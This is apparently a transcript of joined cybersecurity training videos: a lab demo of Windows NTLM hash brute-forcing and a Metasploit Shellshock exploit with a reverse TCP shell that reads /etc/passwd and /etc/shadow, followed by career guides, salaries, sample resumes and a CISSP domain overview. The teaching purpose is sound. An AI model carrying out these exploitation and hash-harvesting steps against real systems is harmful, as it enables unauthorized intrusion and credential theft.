the users are hacker admin, test, the one that we are logged in as, and then there's a user called virus as well. And you can see that this is the hash value of the password that is being utilized. Now there's a particular format for a hash value for Windows and how it stores. But once we have these hash values, let's say if I want to crack this password, there are various attacks that we can do. For example, a dictionary based attack or a brute force attack. Let's try a brute force attack, right? NTLM is the hashing mechanism that is used by Windows. So we are going to try to create an NTLM hash attack. And here we are going to use a predetermined rule set. For example, we are not sure what characters are being utilized over here. So we just create an attack like this using all characters and lowercase a through z, uppercase a through z, numeric 0 through 9, and all the special characters. Let's say the password is between 7 and 16 characters. And this is the character set that we want to try the brute force attack on. What is a brute force attack? It is an attack where the computer is going to try each and every permutation and combination out of this character set and try to figure out if the password is going to be correct. So if we click start, it's going to start with a particular characters and then it is going to identify if that NTLM hash is going to work against this character. And you can see the time is going to be phenomenal over here. So it's not necessary that this attack would be viable. It will be 100% successful given the time frame. However, the time frame is huge enough for this attack to become a little bit redundant. There are other attacks that we can do which can easily identify this data for us as well. But that is something that we will look on in future videos. So that's how we can get access to users and passwords. There are different mechanisms where, let's say we don't have login access, then what are we going to do? How we can create a fake user, login, or how we can remotely access a machine and then try to get the same access. And that is what we are going to try to do in the next demo on a Linux machine. So what we are doing in a Linux machine could also be doable on the Windows machine with a different exploit. So what I'm going to do is, this is the Linux web server that I have that I'm going to power on. I'm going to use a Kali Linux machine to hack that device, and I'm going to just power off my Windows 7 machine. Give it a minute till it boots up. Now this is also a demo machine that we have which has its own pre-configured vulnerabilities. So here we've got something from the pen testers lab and has a shell shock vulnerability implemented inside. Shell shock vulnerability affects Linux, Mac, and Unix based operating systems for a particular version of the bash shell. Bash is the born again shell, which is the command line interface in these operating systems. So what we are trying to do here is we are going to use the Kali Linux machine, try to find out the vulnerability over here, and if it exists, we are going to use Metasploit to attack this machine. Now the first and foremost thing is we want to identify the IP address. We have no idea what the IP address is. We are in the same subnet, so we are assuming that we are able to connect to this machine. So what I'm going to do is I'm going to open up a tool called ZenMap. I'm going to open up a command line interface find out what my IP address is, and my IP address is this with a subnet mask of 255.255.255.0. So I want to see if there are any other machines that are live in the same subnet, and we are doing a ping sweep over here to identify which machines are live. In a minute we'll get all the IP addresses. 71.1, 2, 133, 254 and 128. We know that we are 128 at this point in time. 254 is the DHCP server. So we are assuming that 133 is the machine that we want to look at, and let's then try to see if we can scan that machine 133, and we're going to do an intent scan to find out which ports are open, what services are running over there, and if it is whether the pentest machine that we were looking for. You can see off the start port 22 and port 80, and somewhere here it's going to give us the ports that are open and the details about those ports, and somewhere here it will tell us that this is the pentester lab machine that we wanted, which is correct. So now we want to do a vulnerability analysis on this. What we are going to do is I'm going to use another GUI based tool called Sparta, which I can just find out from here. Sparta uses two tools in the background, Nmap tool and a tool called Nikto. So we're just going to start scanning 192.168.71.133 was the IP address, add to scope, and over a period of time you can see all of these will start populating with information. There we are. That's the Nikto tool coming in, scanning on port 80, which means that it's a web server using HTTP. It tells us it's an Apache HTTPD 2.2.21, and gives us the 22 port number as well. If we head over to the tab of Nikto, or let's look at the screenshot first. This is what the website would be looking like, and Nikto gives us the options over here. It tells us that there is a vulnerability over here for shell shock, and this is the path where the vulnerability is going to exist. So what we are going to do, we go back to the command line, we open up a new one, minimize all these other windows, and we are going to open up Metasploit. Metasploit is a penetration testing tool that is used by most hackers and ethical hackers to test applications and test existing exploits and vulnerabilities. So just give it a minute till it starts. You can see there are already around 1700 exploits right here. We are going to see all those exploits with these commands. There we are, sorry for the typo. And it will just give us a list of all the exploits that are stored in Metasploit in this version. So all of these are Windows based. If we scroll up, we will be looking at other vulnerabilities as well, or exploits, the Unix based exploits, Linux, OS X, multi-exploits. And we are looking for an exploit for multi-based Apache or HTTP. Let's go up, let's look at, so this is the one that we are looking for, Apache mod CGI bash environmental executable. So what we're going to do is we're just going to copy it, go back to the bottom, say use exploit, and paste the one that we wanted. Press enter, say show options. So it will ask us to configure this. I'm just going to configure it based on the knowledge that we have. Set our host, which is the remote host, the victim's machine. So we put in the IP address. It asks us for the target URI. So that's the path that we saw. Set target URI to cgi-bin/status. Enter. Now with the exploit, we need to find a payload that is going to give us the output that we want. So we say show payloads, and it will give us a list of all the compatible payloads with this exploit. And we want to create a reverse TCP connection, which is this. So we know it's a Linux operating system. We want this payload to be set. So set payload. Press enter. That's the payload coming in. Show options. Now that we have set the payload, this is the options for the exploit, and now we want to set our options for the payloads as well. So we are creating a reverse TCP connection, which means we are remotely executing code at the victim side and making the victim connect back to our machine, which means we need to set up a listener. So I need to put my IP address over here, set localhost or lhost 192.168.71.128, which was our IP address. Show options again just to ensure everything is fine, which looks like it is, and we then type in the word exploit so that it will start this attack. I can see that it has created a Metasploit session at the victim side, and it has opened up a session. So if I do a pwd, now pwd is a Linux command for present working directory, and it will show us that we'll connect it to var cgi-bin. Do an ls, it will list all the files. That's the status file over there. Do a cd /, it will take us to the root of this machine. Now remember, we saw the passwords on a Windows machine. Similarly, we can head over to the cd etc folder, ls, and you can see these files, psswd and shadow. Now PSSWD is the file where Linux stores its usernames, and shadow is the file where passwords are shown. So do a cat command PSSWD, and you can see these users coming up. So you can see the last user Pentest Lab, and you can see there are no passwords. So let's do a cat shadow, and that's your hash value for the password that we have for the user Pentest Lab. So these are the different attacks that we need to understand and we need to create based on the vulnerabilities that exist on different machines. So if you just looked at Windows and Linux and how we can exploit them depending on existing vulnerabilities. As an ethical hacker, this is what we need to learn in our trainings, and then we need to clear our exams based on this knowledge of how these things work, so that we get certified and then we can position ourselves for the penetration testing jobs.
In today's world, data is generated and exchanged at a high speed. Did you know that 2.5 quintillion bytes of data are generated every day? Companies all over the world make crucial decisions by analyzing all of this data. With the rise of data, there has been a tremendous increase in the number of cybercrimes across the globe. To prevent cyberattacks, cybersecurity is implemented. So what is cybersecurity? It is nothing but the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access. As mentioned earlier, companies rely on data, and it is required that the data is not compromised or stolen. To do this job, we have various cybersecurity professionals who are skilled to protect data from cyberattacks. There has been a sky-high growth in the number of cybersecurity jobs. This growth will only double in the near future, as companies will always be on the lookout for skilled professionals who can protect the confidentiality of the data. So now that we know why cybersecurity jobs are important, let us have a look at the various cybersecurity job roles. There are various kinds of cybersecurity job roles. Let's go through few of the top paying job roles. Going in the descending order of the salary structures in the USA, we first have the Chief Information Security Officer job role, followed by the Security Architect, Penetration Tester. Then we have Cybersecurity Engineer, Malware Analyst, and finally we will look into the Computer Forensic Analyst job role. I will now brief you about each of these job roles individually and look into their responsibilities, skills, and salary structures, both in the USA and in India. So let's start off with Chief Information Security Officer. A CISO is a senior level officer in any organization. He is entrusted with the safety of the data in an organization. A CISO has various responsibilities. They are required to develop, implement, and maintain an organization's security and risk management program. They also communicate with their organization's stakeholders and brief them about various information-related security concerns. By doing so, they are able to implement a better security system for an organization. At times, a CISO would have to also recruit an IT team's members. They need to make sure that the candidate is knowledgeable and skilled. A company's risk and vulnerabilities have to be predicted beforehand. Prediction of such risks and vulnerabilities are taken care of by a CISO. They play a major role in preventing cyber attacks in any organization. Let's now look at the different skills required to be a Chief Information Security Officer. First and foremost, a candidate must have good communication and presentation skills. This is very important for any organization. A degree in computer science along with an MBA is a preferred qualification. MBA is not mandatory, but there is an added advantage if the candidate has an MBA along with a computer science degree. The candidate must be good at handling security breaches. It is preferred that the candidate has prior experience of handling a security breach and who is also good with incident management. Many employers prefer candidates who have global certifications. To become a Chief Information Security Officer, the preferred certifications are CISM, that is Certified Information Security Manager, and Certified Information System Security Professional, CISSP. If a candidate has either of these certifications, they have a better chance of getting a job as a Chief Information Security Officer. Let's now move on to their salary structures. A CISO earns nearly $180,000 in the USA. In India, the salary is nearly 25 lakhs per annum. That's a lot of money. So these were the responsibilities, skills, and the salary structure of a Chief Information Security Officer. Let's move on to our next role. Our next role is that of a security architect. A security architect maintains the security of an organization's computer systems. They prevent the computer systems from malware attacks. Let's look into their responsibilities. First and foremost, our security architect identifies weak spots in a system by performing vulnerability tests. These tests are carried out on a regular basis. Along with vulnerability tests, risk analysis and security assessments are also done by a security architect. Installation of routers, VPN and firewalls are approved by a security architect. These devices are very important when it comes to the security of an information system. Well, a security architect rightly approves the installation of these devices. Digital signatures and public key infrastructures are designed. In addition to all the above responsibilities, a security architect also provides technical assistance and guidance to the other security team members. Let's now move on to the skills required to be a security architect. First and foremost, the candidate must have a computer science or an information technology degree. Coming to the experience, the candidate must have an experience in the field of risk management, as the role of a security architect is a lot to do with managing risks. Understanding of the network basics and various security protocols along with cryptography is required to be a good security architect. Lastly, the preferred certification to become a security architect is that of a CISSP, which is Certified Information System Security Professional. As mentioned earlier, this is only a preferred certification. A candidate who has this certification has a higher chance of bagging a security architect job. Let's now look into the different salary structures in the USA and in India. In the USA, a security architect earns nearly $123,000 per annum. In India, a security architect earns nearly 20 lakhs per annum. So that's all about security architect. Let's now move on to our next role, that is penetration tester. A penetration tester, also known as an ethical hacker, is a cybersecurity professional who tries to exploit a security system's vulnerabilities just like how a hacker would do. A penetration tester mimics the role of a hacker. Let's look into the various responsibilities of a penetration tester. As the name suggests, a penetration tester needs to perform penetration tests to discover and identify vulnerabilities in a system. In addition to this, they are also responsible for designing new penetration tools. All the penetration tests results are documented, and based on the document, new security measures are discussed with the other IT team and the management. A penetration tester performs tests by developing codes, and they also conduct security audits which help them understand the vulnerabilities in a system. Let's now look into the different skills required to be a penetration tester. A candidate must have 1 to 4 years of experience in the information security field. Knowledge of Windows, Linux, Unix operating systems is required. Also, the candidate must know C and C++. Languages such as Java, PHP, and Perl are preferred by employers, but not a requirement. To successfully bag the position of a penetration tester, the preferred certifications are Certified Ethical Hacker, that is CEH, and Certified Expert Penetration Tester, that is CEPT. Let's look into the salary structures of a penetration tester. In the USA, a penetration tester earns nearly $117,000 per annum. And in India, a penetration tester makes nearly 4 lakh rupees per annum. So those were the responsibilities, skills, and salary structures of a penetration tester. Let's now move on to our next job role, that is cybersecurity engineer. On the whole, a cybersecurity engineer protects an organization's network and its data. They also plan security measures to prevent an organization from cyberattack. Let's look into the responsibilities of a cybersecurity engineer. They design cybersecurity platforms for a company. They are also responsible for planning and implementing cybersecurity measures. Well, a cybersecurity engineer solely designs, plans, maintains, and implements security measures in an organization. They're also required to report and communicate with the other teams in an organization. A cybersecurity engineer is different from a network security engineer. While a network security engineer looks into the troubleshooting, a cybersecurity engineer looks into the prevention of cyber attacks. Let's look into the skills required to become a cybersecurity engineer. Just like the other job profiles, a degree in computer science or information technology is a must. Well, 2 years of experience in the relevant field is required to become a cybersecurity engineer. A cybersecurity engineer is needed to design security systems. Hence, a candidate with a good problem-solving skill is required. Along with good problem-solving skills, the candidate must also be good with networking skills. As mentioned earlier, knowledge of C and C++ is a must. Java and Python knowledge is preferred to be a cybersecurity engineer. Moving on to the salary, a cybersecurity engineer earns nearly $96,000 in the USA. Whereas in India, a cybersecurity engineer earns nearly 7 lakh rupees per annum. Moving on to our next job role, that is malware analyst. As the name suggests, a malware analyst is one who identifies various cyber threats such as worms, viruses, trojans, bots to understand their nature. A malware analyst is skilled at analyzing the different malware threats in a system. Let's now look into a malware analyst's responsibilities. They are responsible to identify threats, and once they identify, they are supposed to document the methods to avoid such malware threats. They also research and develop malware protection tools. Various malware protection tools are developed by malware analysts so that the next time a cyber threat occurs, they are able to easily identify. In addition to the above responsibilities, a malware analyst is also responsible to constantly be updated with the new malware threats. Moving to the skills required, a candidate must know Windows, Linux, Unix operating systems, and knowledge of C and C++ is a must. Usage of tools like IDA, Pro, OllyDBG, RegShot, and TCP View is suggested. Having a GIAC reverse engineering malware certification is a plus point. The certification is only a preferred certification. It is not a must that the candidate must possess this certification. Moving on to the salary structure, a malware analyst earns nearly $80,000 in the USA and earns nearly rupees 6 lakhs per annum in India. So those were the skills, responsibilities, and salary structure of a malware analyst. Let's move on to our last job role, that is computer forensic analyst. Previously, we have seen the job roles wherein they try to protect a company from a cyber attack. In this role, we will see how a computer forensic analyst works after a cyber attack. A computer forensic analyst works on cases following an attack. They collect digital evidences to retrieve information. Let's look into their responsibilities. With the help of various investigation tools, a computer forensic analyst gathers evidences from a system which was a victim of a cyber attack. Their main responsibility lies in recovering deleted, manipulated, or stolen data. A computer forensic analyst helps various officials in investigating a case by discovering evidences from data which was manipulated or compromised. There have been a lot of cases where a computer forensic analyst has come to the rescue of the police department. Moving on to the skills, the candidate must hold a bachelor's degree and work experience in the related field is required. For the post of a computer forensic analyst, it is not necessary that the candidate must hold a computer science degree, but the candidate must have relevant work experience. A candidate must have knowledge of networking, law, and criminal investigation, as they have to do a lot with investigating cases as well. A sound analytical mind is critical as they have to analyze data and arrive at conclusions as to identify the cybercriminals. The preferred certifications to become a computer forensic analyst are Certified Forensic Computer Examiner, that is CFCE, and Certified Computer Examiner, that is CCE. Well, these were the skill sets required to become a computer forensic analyst. Moving on to the salary structures. A computer forensic analyst earns nearly $71,000 in the USA. And in India, a computer forensic analyst earns nearly 8 lakh rupees per annum. That was all about computer forensic analyst. Well, those were the 6 top paid jobs in the field of cybersecurity. Now, I will run you through a sample resume of a cybersecurity engineer. This is only a sample resume of a cybersecurity engineer. You can alter it according to your own preference. Here, we first start off with the name and your email ID and phone number. Then a quick summary about yourself and what you're good at and what you are looking for in an organization. After which you can give your LinkedIn profile link and your GitHub profile link if you have one. Moving on to the experience. Here you would have to give the company's name and the tenure. Ideally for a cybersecurity engineer, the minimum number of years required is 2. And below that, you can write the different responsibilities that were taken care by you in your previous organization. TCP/IP network administration and security monitoring are 2 important responsibilities that any cybersecurity engineer must have on their resume. It is great if you have configured firewalls and IDs as well. Underneath that, you can mention the education, and it is required that you have a degree in computer science or in information technology. You can then mention your university and your GPA. Moving on to the skills. We have technical skills and non-technical skills here. Under technical skills, you would have to write the languages that are known to you. For example, C, C++, which is a must. Java and Python are preferred too. Knowledge of Windows, Linux, and Unix operating systems will also have to be on your resume if you're applying for a post of a cybersecurity engineer. The other skills depend from person to person. Here I have IDS and IPS penetration vulnerability testing, encryption technologies, knowledge of SQL, and at the end you can also write the certifications. Ideally, a cybersecurity engineer must have CCNA, CCNP certifications. In addition to it, even a CompTIA Plus certification is preferred. Moving on to the non-technical skills, here you can mention the languages that you're good at, the different competitions that you have participated in. It can also have your co-curricular activities, and anything to do with problem solving would also be an added advantage. With the increase in the number of cybercrimes across the globe, there is also an increase in the number of cybersecurity jobs, and the role of an ethical hacker tops the list. Hi guys, this is Shruti from Simplilearn, and today I will run you through this video on ethical hacking career. So let's get started and explore the world of ethical hacking. Let's begin with a few facts. Did you know that by the year 2021, there will be 3.5 million cybersecurity job openings? That is a huge number, isn't it? And also, according to the US Bureau of Labor Statistics, there will be 28% increase in the number of jobs from 2016 to 2026 for information security analysts, which includes ethical hackers. This proves that there is a great demand for ethical hackers at the moment. As I mentioned earlier, the number of cybercrimes across the world will increase as the digital era will only continue to grow. Organizations will be on the lookout to hire professionals who can fight these cybercrimes and protect the company's data. And to fight these cybercrimes, we will require individuals who can think like a hacker. And who is that? Well, to do this job, we have ethical hackers. As you might be knowing, an ethical hacker is trained to discover system vulnerabilities. An ethical hacker is also known as a white hat hacker. He or she is given authorization from the company to perform security assessments. And at the end, an ethical hacker would have to report the findings back to the company so that the vulnerabilities can be fixed. An ethical hacker performs these security assessments with the help of various hacking techniques and tools. Let's now move on to our next topic, that is the steps to become an ethical hacker. You might wonder how to start your ethical hacking career, right? Well, I will take you through that step by step. Firstly, the candidate must have a computer science or an information technology bachelor's degree. It is also possible to become an ethical hacker without these degrees, but provided you have the required skill sets and experience. The next requirement to be an ethical hacker is that the candidate must have a minimum of 2 years of experience in the information security field. You have to start your career with a software or a networking job, and only then can you move on to the ethical hacking field. You have to start your career with a software or a networking job, and only then can you move into the ethical hacking field. Coming to the certifications, it is necessary for the candidate to hold various cybersecurity certifications. Certifications play a vital role in the field of cybersecurity. Your job opportunities can solely depend on these certifications. To become an ethical hacker, you can start off with the foundational level certifications such as the CCNA and CompTIA Security Plus certifications. Finally, the last step to become an ethical hacker is to clear the Certified Ethical Hacker examination. CH certification is provided by the EC Council. It trains the candidate to protect a company's network by using the same tools and methods that a hacker would use. The CH exam will have a duration of 4 hours with 125 number of questions. If the candidate clears this exam, then he or she will become a certified ethical hacker. Now that you know the steps to become an ethical hacker, let's look into the skill sets which are required to help you achieve these steps. First and foremost, an ethical hacker needs to have an in-depth knowledge of the working of the operating systems. Knowledge of Windows, Linux, and Macintosh operating systems is required. For penetration testing, creating exploits, and bug hunting, programming will be important. So knowledge of programming languages such as C, C++, HTML, Python, and PHP will be very helpful. Basic knowledge of networking, TCP/IP protocols, and OSI model is necessary as networking is the foundation of cybersecurity. For securing databases, knowledge of SQL, NoSQL, PostgreSQL is necessary. Cryptography is used to secure information. It is the process of converting data from a readable format to a non-readable format and vice versa. Cryptanalysis is decryption without a secret key. In most cases, certified ethical hacker would need to perform cryptanalysis. Hence, ethical hacker has to be comfortable with cryptography and cryptanalysis. Ethical hackers should be proficient in network security control measures such as intrusion detection and intrusion prevention techniques. Now let's move on to the responsibilities which are taken care of by an ethical hacker. Let's have a look at these responsibilities. An ethical hacker is responsible for scanning systems, open and closed ports using tools like Nessus and Nmap. Vulnerabilities and threats are identified by doing this. In addition to scanning for vulnerabilities, they also search the deep corners of the network to spot critical information such as passwords, which can make the organization vulnerable to an attack. In addition to building and maintaining IDS, IPS, and firewalls, they also try to evade these security measures to gauge the performance of the systems. A lot of times, a company's online fraud or online theft incidents are looked into by an ethical hacker. An ethical hacker also checks for sniffing networks and hijacked web servers and applications. Those were the responsibilities of an ethical hacker. Now let's look into the various job roles an ethical hacker can apply for. It is a misconception that an ethical hacker will perform only penetration testing. Well, there are a number of other jobs an ethical hacker can apply for. The different job roles such as that of a penetration tester, information security analyst, security consultant, and an information security manager. Let's have a look at each of these job roles one by one. A penetration tester performs the typical responsibility of an ethical hacker. That is, he or she tries to exploit a security system's vulnerabilities. This is carried out using different hacking tools and techniques. An ethical hacker can also apply for the role of an information security analyst. There is a difference between the job roles of a penetration tester and that of an information security analyst. Here, the candidate will be required to primarily design and protect the organization's network from various cyber attacks. Finally, the candidate is also required to document the identified security breaches so that it can be omitted the next time. The responsibilities of a security consultant is more or less similar to that of an information security analyst that we saw previously. As a security consultant, you will be responsible to design, implement, and maintain various security architectures. In addition to this, you're also required to upgrade the security systems as and when required. Finally, an ethical hacker can also apply to the role of an information security manager. As the name suggests, this role will require the candidate to possess managerial skills, as an information security manager is responsible to head the IT and the information security team. Now that we have seen the responsibilities, the skills, and the steps to become an ethical hacker, let's have a look at the different companies hiring ethical hackers. To name a few, we have Bank of America, Ernst & Young, KPMG, Urban Pro, and IBM. Let's now look into the salary structure of an ethical hacker. Well, in India, the average annual salary of a certified ethical hacker is nearly 4,76,000 rupees. And in the US, the average annual salary of a certified ethical hacker is $91,000. Now I will guide you through a sample resume of a penetration tester. As you can see on your screens, this is a sample resume of a penetration tester. We will look into this resume closely and understand how your resume should look like if you are applying for the role of a penetration tester. As always, you can start off with your name and your email ID and your phone number, followed by a brief summary of your current job profile. It is preferred to add your LinkedIn profile link here and also your GitHub profile link if you have one. As I mentioned earlier, this is a sample resume for a penetration tester, and hence we have to have more than 2 years of experience in the information security field. As you can see under the experience section, the candidate has 2 prior experiences, out of which the first experience is that of a software tester and second is that of a penetration tester. You would have to mention your latest or current experience at the beginning. You can mention your job role and the company and the duration, under which you can list out the various responsibilities that you are looking into currently. If you are a penetration tester, you can mention responsibilities such as security monitoring, black box testing, documentation of the results, vulnerability scanning, and so on. Below this, you can mention your first company's experience with the roles and responsibilities that you have performed earlier. Here, the candidate was a software tester before becoming a penetration tester. Let's move on to the education section. Here, the candidate holds a bachelor's degree in computer science. You can mention your degree followed by the university name. Or if you're applying for any other role in the cybersecurity domain, it is recommended that you list out the certifications as well. To start off with, a CCNA certification will be preferred, followed by a certified ethical hacker certification, which is a must if you are applying for the role of a penetration tester. In addition to it, the Certified Expert Penetration Tester certification will also hold a great advantage. After mentioning the certifications, you can go ahead and mention your skill sets. Here we have the technical skills and non-technical skills. Under technical skills, you can mention the programming languages that you know. Here we have C, C++, Java, Perl. You can also mention the operating systems that you have worked on. For example, Windows, Linux, Unix. And in addition to the programming languages and the OS, you can also mention the tools that you know, such as Nmap, Metasploit tools, which will be helpful if you are applying for the role of a penetration tester. Then you can also mention encryption technologies, knowledge of SQL, and bug tracking systems if you have worked on them before. If you have participated in ecodathons, you can mention that here as well. Under the non-technical skills, you can mention various competitions that you have taken part in and the games that you like and other extracurricular activities. Finally, you can also mention the projects undertaken. Under the projects undertaken, you can talk about the various projects that you have performed in your company or outside the company. Here, we have 2 projects, one as a software test engineer and second one as a penetration tester. So this is how a resume of a penetration tester will look like. So let's start off this tutorial by understanding the need for the CISSP certification. If you have seen our previous videos, you would be aware of the various cybersecurity certifications like CCNA, CompTIA Security Plus, CISM, CISA, and CEH to name a few. You might have also come across the CISSP certification. Let me tell you, this is one of the toughest and most in-demand certification in the cybersecurity field. In the current times, managing information security in a company can be extremely challenging. With the advent of the internet and various other technologies, there is a large exposure to various security breaches. The presence of information security experts in-house helps organizations manage their IT processes in a better way. This is where a CISSP professional is in demand by employers. Compared to the other cybersecurity professionals, the demand for CISSP certified professionals has grown rapidly. There are nearly 50,000 job postings for the same. Now that you have an idea of the demand of CISSP certified professionals, let's move on to understanding what exactly is CISSP. CISSP stands for Certified Information System Security Professional. It is considered the gold standard in the field of information security. This certification is taken up by IT professionals. It trains a candidate to become an information assurance professional. Taking up the CISSP certification will help you define the design, architecture, controls, and management of highly secure business environments. You will also be called a CISSP professional only after you successfully pass the CISSP exam. So now let's have a look into the CISSP exam requirements. The primary requirement for any candidate is that they should have at least 5 years of work experience in the field of information security. In addition to this, it is also suggested that the candidate clears other certifications like CCNA, CompTIA Security Plus, CEH, CISM, and CISA to name a few. CISSP is considered as an advanced level cybersecurity certification. Hence, it is better if the candidate clears the basic level and the managerial level certifications before moving to the CISSP certification. As I mentioned earlier, this certification is suitable for professionals who have a minimum of 5 years of work experience. Professionals working as security consultants and managers, network and security architects, IT directors, security auditors, and chief information security officers can take up the CISSP certification. Let's now move on to our next topic, that is CISSP domains. This entire certification is grouped into a total of 8 domains. The broad spectrum of topics included in CISSP ensure its relevance across all disciplines in the field of information security. Successful candidates are competent in the following 8 domains. They are security and risk management, then we have asset security, security engineering, communications and network security, followed by identity and access management, then security assessment and testing, security operations, and finally we have software development security. These 8 domains deal with different aspects of information security. We will have a look into each of these individually and understand what each of these domains symbolize. First up, we have the security and risk management domain. As the name suggests, this domain mainly consists of the fundamentals of security policies, compliance law and regulations, professional ethics, risk management, and threat modeling. Cybersecurity and information security plays a major role in this domain. There is a difference between cybersecurity and information security which is more often missed out on by people. Cybersecurity refers to several techniques used to protect the integrity of networks, whereas information security refers to processes and tools deployed to protect sensitive information. To implement cybersecurity, we have a list of approaches like compliance-based, ad hoc, and risk-based. In compliance-based, security measures are decided based on regulations, while in ad hoc, security measures are based on no specific criteria. In risk-based, security measures are based on unique risks depending on the organization. Let's now have a look at the CIA triad. Here, C stands for confidentiality, I for integrity, and A for availability. Confidentiality, integrity, and availability have served as the industry standard for computer security since the time of the first mainframes. Confidentiality means that information and functions can be accessed only by authorized parties, for example, military secrets. Integrity means that information and functions can be added, altered, or removed only by authorized people. And availability means that systems, functions, and data must be available on demand. Now that we have understood the CIA triad, let's have a look at the GRC trilogy. This trilogy is a structured approach adopted by organizations to align IT objectives with business objectives. First up, we have governance. Such a program has motives like ensuring goals are achieved, providing strategic plans, and so on. Governance is taken care of by the senior professionals of an organization. Next up, we have risk management. Here, the organization looks into mitigating all types of risks such as investment, physical, and cyber risks. Finally, we have compliance. As discussed previously, compliance refers to abiding by the defined laws and regulations. So who do you all think develops a security policy which is used to achieve the organization's goals? Well, it is done by the senior management of an organization. Let's have a look at the characteristics of these security policies. First and foremost, these policies should support the vision and mission of the company. All the business units should be integrated in these security policies. They should also be regularly updated. And finally, it is important that these security policies should be easy to understand so that everyone can abide by them without any problem. In addition to security policies, a risk analysis team is also formed in organization to perform the analysis of each known risk. There are various steps to perform risk analysis. Let's have a look at each of these. First, the team makes an assessment of the value of the company's assets. Then, there is an analysis made based on the risks to assets. And finally, the team discovers solutions to mitigate these risks. Now that was all about the first domain of CISSP, security and risk management. Let's have a look at the second domain, asset security. Asset security deals with the collection and protection of assets such as data and devices. Here, we will be looking into data classification, data management, data remnants, and data loss prevention. So in data classification, the data owner classifies data. A data owner can be an individual or a group of people who created the information and are directly responsible for it. This classification is done based on a set of predefined criteria. At the end, the classification is annually reviewed to see if there has to be some change incorporated. Data management involves managing the information lifecycle needs of an enterprise in an effective manner. It also ensures that the data complies to the set standards. And finally, data management also ensures data validity and integrity. Moving on to data remnants. It is a term used for the residual of digital data that is present even after trying to erase the data. Data remnants should be avoided as data should be completely destroyed. To tackle data remnants, we have methods like overwriting and destruction to name a few. In overwriting, other information is written over the data several times so that the original data cannot be recovered. In destruction, data in the storage device is physically damaged to make recovery difficult. Asset security also looks into data loss prevention. Here, several measures and risk assessments are performed to ensure that information is only available to authorized users. Let's now move on to our third domain, security engineering. As the name suggests, this domain talks about security architecture, security models, cryptography, and physical security. Security architecture establishes a common practice for creating, analyzing, and using architecture description within a particular domain. Security architecture takes the help of TCB, that is Trusted Computing Base, security perimeter, and reference models to implement security. Cryptography is also a part of security engineering. In cryptography, information is secured by converting data from a readable format to a non-readable format and vice versa. Moving to our fourth domain, we have communications and network security. This domain is all about network structures, transmission methods, and security measures used to achieve CIA in an organization. OSI model is the foundation of networking. This model, that is the Open Systems Interconnection Model, OSI model, describes how data is transferred from one computer to another. The OSI model consists of 7 layers, starting from physical layer, then data link layer, network layer, transport layer, session layer, presentation layer, and finally application layer. In the first layer, that is, physical layer transmits raw bit stream over the physical medium. Then data link layer defines the format of data on the network. Network layer provides logical addressing and it also provides path determination using local addressing. The fourth layer, that is transport layer, provides end-to-end connections. In this layer, data is transmitted using transmission protocols including TCP and UDP. The session layer maintains connections and it is also responsible for controlling ports and sessions. The sixth layer, that is the presentation layer, ensures that data is in a usable format. And finally, in the seventh layer, that is in the application layer, human-computer interaction happens. Here, applications can access the network services. The communications and network security domain also talks about firewalls. We can define a firewall as a hardware or software which is used to block the incoming or outgoing traffic from the internet to your computer. Then we also have the IDS. IDS is known as the Intrusion Detection System. This is designed to detect unauthorized access to a system. IDS is used together with a firewall and a router. Moving to identity and access management, our fifth domain, let's have a look at what this domain is all about. This domain of CISSP is all about the access control, identification, authorization, and attacks on access control and its countermeasures. To be able to access a dataset or a resource, a subject has to be identified, authenticated, and authorized. Identity management, Kerberos, and access criteria are few of the crucial fields here. In identity management, through automated means, users are identified and authenticated. This domain also speaks of Kerberos, an authentication protocol that is based on symmetric key cryptography and provides end-to-end security. Access to data shouldn't be granted to anyone and everyone. In fact, it should be granted based on the level of trust and the job role in the organization. It is also better if it is provided based on the location and the time. Let's now have a look at our sixth domain, security assessment and testing. So in this domain, we will look into audits, security control assessment, and testing reports. As you might have heard of the term audit, it is nothing but a repeated process wherein an independent professional evaluates and analyzes evidence. Then we have vulnerability assessment, wherein IT risks are identified and evaluated. It helps in identifying, quantifying, and prioritizing vulnerabilities. A well-planned and executed assessment and test strategy can provide valuable information about risk and risk mitigation. The assessment and test is executed by a working group called the Integrated Product Team. Testing is performed to check the data flow between the application and the system. Up next, we have the Security Operations domain. The 7th domain of CISSP is all about investigations, monitoring and logging, disaster recovery, and change management. Here, we will look into the fields of digital forensics, incident management, and perimeter security. Investigation of a computer crime is also known as computer forensics. In digital forensics, data is examined to identify, recover, and analyze opinions about digital information. Incident management works to restore the services to normal as soon as possible. A team called the Incident Response Team is deployed to handle such emergencies. Incident response is defined as a practice of detecting a problem, determining its cause, minimizing the damage, resolving the problem, and documenting each step. This team provides management with sufficient information and defends the company against future attacks. In perimeter security, there is perimeter defense, which allows us to detect and keep a check on unauthorized physical access. This field also controls the access to the facility. Moving on to our 8th and final domain, we have software development security. As the name suggests, this domain talks about security in a software development lifecycle. Here, we will be looking into topics like API, malware, spyware, adware, social engineering attacks, and SQL injection attack. Let's start off with the application program interface known as API. API is basically a collection of protocols and functions used to create applications. It supports formats such as representational state transfer REST and simple object access protocol. REST is nothing but using the present features of the web in a simple way. And SOAP, which is an acronym for Simple Object Access Protocol, is a messaging protocol for exchanging data among computers. Now let's move on to malware as a security threat. Malware is a term which refers to malicious software, viruses, ransomware, and worms. We can also call Trojan virus as a form of malware which is capable of disguising itself as a legitimate software. Malware is basically a broad term that refers to a variety of malicious programs. One way to protect your software from malware is to always double-check your downloads. Moving on to our next security threat, spyware. As the name suggests, this is a software that typically spies on your system. Spyware is also a type of malware which is used to secretly gather information of the victim to give it to a third party. Those programs that secretly record all that you do on your computer are called spyware. It is always advised to turn on pop-up blockers to prevent spyware. Next up, we have adware. Adware is also known as advertising supported software. It is a type of malware that constantly displays ads and pop-ups. Some of such ads can also gather your information. At times, adware is not all that dangerous, but it is a hassle as it is a gateway to unwanted advertising on the screen, and it can also change the browser homepage. Adwares are known to display unwanted, annoying advertisements on your screens. Let's now have a look at social engineering attacks. It is basically the art of manipulating people so that they end up giving their confidential information. This attack lures victims into handing over their confidential data. This attack takes place by tricking the human mind. The most common social engineering attacks are phishing, spear phishing, and veiling phishing attack. Phishing attack is a practice wherein the hacker usually sends fraudulent emails which appear to be coming from a very trusted source. This is done to install malware or to steal sensitive data like credit card information and various other login credentials. Spear phishing attack is a variation of phishing. Here, the attacker targets a specific individual or a group of people. And in veiling phishing attack, wealthy, powerful, and prominent individuals are made targets. Moving on to our next attack, we have SQL Injection Attack. SQL Injection Attack is a type of code injection attack. In a database-driven website, the hacker manipulates a standard SQL query. It allows attackers to tamper with the existing data. Here, malicious code is inserted into the SQL server to obtain information.
